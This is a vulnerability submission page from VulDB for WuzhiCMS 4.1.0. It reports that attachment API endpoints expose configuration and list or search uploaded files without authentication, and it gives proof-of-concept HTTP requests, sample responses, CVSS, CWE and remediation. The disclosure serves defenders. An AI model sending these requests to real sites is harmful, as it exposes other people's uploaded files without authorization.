Submit #854588: WuzhiCMS 4.1.0 Information Disclosureinfo

TitelWuzhiCMS 4.1.0 Information Disclosure
BeschreibungWuzhiCMS 4.1.0 — Unauthorized Attachment API Access Field Value Vendor WuzhiCMS / 五指 CMS Product WuzhiCMS Version 4.1.0 (and likely earlier) Type Information Disclosure / Missing Authorization CWE CWE-200, CWE-862 Authentication None (unauthenticated) Proof of Concept PoC-1 — UEditor config (no Cookie header): GET /index.php?m=attachment&f=index&v=upload&action=config HTTP/1.1Host: TARGETAccept: application/json, text/plain, */*Connection: close Verified response excerpt (WuzhiCMS 4.1.0, Docker, 2026-05-29): {"imageActionName":"uploadimage","imageMaxSize":2048000, "imageAllowFiles":[".png",".jpg",".jpeg",".gif",".bmp"], "fileMaxSize":51200000, "fileAllowFiles":[".png",".jpg",".jpeg",".gif",".bmp",".flv",".swf", ".mkv",".avi",".rm",".rmvb",".mpeg",".mpg",".ogg",".ogv",".mov", ".wmv",".mp4",".webm",".mp3",".wav",".mid",".rar",".zip",".tar", ".gz",".7z",".bz2",".cab",".iso",".doc",".docx",".xls",".xlsx", ".ppt",".pptx",".pdf",".txt",".md",".xml"], "catchRemoteImageEnable":true, "catcherLocalDomain":["127.0.0.1","localhost","img.baidu.com"], "imagePathFormat":"{yyyy}/{mm}/{dd}/{time}{rand:6}", ...} PoC-2 — List attachments: GET /index.php?m=attachment&f=index&v=upload&action=listimage&start=0&size=5 HTTP/1.1Host: TARGETAccept: application/json, text/plain, */*Connection: close Verified response (clean install): {"state":"SUCCESS","list":[],"start":1,"total":"0"} Example with data (populated site): {"state":"SUCCESS","list":[ {"url":"http://TARGET/uploadfile/2015/05/201505131018344338.png", "mtime":1431483515,"title":"demo"}],"start":1,"total":"42"} PoC-3 — Keyword search (still unauthenticated): GET /index.php?m=attachment&f=index&v=upload&action=listimage&start=0&size=50&q=invoice HTTP/1.1Host: TARGETConnection: close Impact Attachment enumeration — Direct URLs and filenames for all uploaded content (member uploads, admin media, documents). Configuration disclosure — Allowed extensions, size limits, storage path templates, remote-fetch settings aid follow-on attacks. No privileges — Network-reachable, no cookies, no user interaction. CVSS 3.1 (estimate): AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N (~5.3 Medium on sites storing sensitive files) Not a duplicate of — Requires &callback= parameter; reflected script execution, not data enumeration. Generic Baidu UEditor CVEs — This is WuzhiCMS-specific missing auth wrapper on attachment/index.php. Remediation Require valid member or admin session at the start of upload() before handling any action. Scope lists() queries to the authenticated user's username (or equivalent ownership column). Restrict action=config to authenticated editors only, or serve a minimal public config. References Verified on WuzhiCMS 4.1.0 (2026-05-29) Vulnerable code: coreframe/app/attachment/index.php:26-67, ueditor.class.php:172-201 Full PoC report: POC_VERIFICATION_REPORT.md §7
Quelle⚠️ https://github.com/wuzhicms/wuzhicms/issues/217
Benutzer
 Anonymous User
Einreichung10.06.2026 04:19 (vor 1 Monat)
Moderieren12.07.2026 17:50 (1 month later)
StatusAkzeptiert
VulDB Eintrag377873 [WuzhiCMS bis 4.1.0 Attachment API index.php?m=attachment&f=index&v=upload config/listimage Information Disclosure]
Punkte20

Interested in the pricing of exploits?

See the underground prices here!